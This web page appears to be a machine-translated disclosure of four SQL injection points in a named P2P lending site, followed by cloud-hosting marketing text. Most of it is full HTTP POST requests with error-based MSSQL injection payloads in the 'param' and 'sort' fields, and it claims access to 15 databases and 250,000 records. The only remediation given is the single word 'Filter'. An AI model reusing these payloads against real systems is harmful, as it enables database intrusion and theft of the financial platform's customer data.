P2P financial security-OK loan Multiple SQL injection vulnerabilities on a site & 15 databases & 0.25 million data information
P2P financial security-OK loan Multiple SQL injection vulnerabilities on a site & 15 databases & 0.25 million data information
Injection Point 1:
POST/Website/abouts/DeleteAboutsRemove HTTP/1.1Content-Length: 180Content-Type: application/x-www-form-urlencodedCookie: ASP. NET_SessionId = accept; accept = Accept, accept; accept = 1459779113; HMACCOUNT = FED91CA2363927EB; cod =; csd = 96 Host: mail.okdai.com: 8888 Connection: Keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* param % 5B0% 5D = (select % 20 convert (int % 2 cCHAR (52) % 2 bCHAR (67) % 2 bCHAR (117) % 2 bCHAR (81) % 2 bCHAR (78) % 2 bCHAR (52) % 2 bCHAR (100) % 2 bCHAR (51) % 2 bCHAR (119) % 2 bCHAR (51) % 2 bCHAR (88) % 20 FROM % 20syscolumns injection parameter: param % 5B0% 5DInjection Point 2:
POST/Website/Feedback/GetFeedbackList HTTP/1.1Content-Length: 197Content-Type: application/x-www-form-urlencodedCookie: ASP. NET_SessionId = accept; accept = Accept, accept; accept = 1459779113; HMACCOUNT = FED91CA2363927EB; cod =; csd = 96 Host: mail.okdai.com: 8888 Connection: Keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* order = DESC & page = 1 & rows = 15 & sort = (select % 20 convert (int % 2 cCHAR (52) % 2 bCHAR (67) % 2 bCHAR (117) % 2 bCHAR (74) % 2 bCHAR (115) % 2 bCHAR (55) % 2 bCHAR (81) % 2 bCHAR (55) % 2 bCHAR (52) % 2 bCHAR (87) % 2 bCHAR (50) % 20 FROM % 20 syscolumns) injection parameter: sortInjection Point 3:
POST/Website/Home/GetFriendDatas HTTP/1.1Content-Length: 207Content-Type: application/x-www-form-urlencodedCookie: ASP. NET_SessionId = accept; accept = Accept, accept; accept = 1459779113; HMACCOUNT = FED91CA2363927EB; cod =; csd = 96 Host: mail.okdai.com: 8888 Connection: Keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* order = DESC & page = 1 & rows = 15 & sort = (select % 20 convert (int % 2 cCHAR (52) % 2 bCHAR (67) % 2 bCHAR (117) % 2 bCHAR (118) % 2 bCHAR (74) % 2 bCHAR (50) % 2 bCHAR (51) % 2 bCHAR (81) % 2 bCHAR (88) % 2 bCHAR (84) % 2 bCHAR (111) % 20 FROM % 20 syscolumns) & StrKey = e injection parameter: sortInjection Point 4:
POST/Website/News/VidelListDetail HTTP/1.1Content-Length: 200Content-Type: application/x-www-form-urlencodedCookie: ASP. NET_SessionId = accept; accept = Accept, accept; accept = 1459779113; HMACCOUNT = FED91CA2363927EB; cod =; csd = 96 Host: mail.okdai.com: 8888 Connection: Keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* order = DESC & page = 1 & rows = 15 & sort = (select % 20 convert (int % 2 cCHAR (52) % 2 bCHAR (67) % 2 bCHAR (117) % 2 bCHAR (117) % 2 bCHAR (114) % 2 bCHAR (108) % 2 bCHAR (79) % 2 bCHAR (76) % 2 bCHAR (54) % 2 bCHAR (105) % 2 bCHAR (53) % 20 FROM % 20 syscolumns) injection parameter: sortSolution:
Filter
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
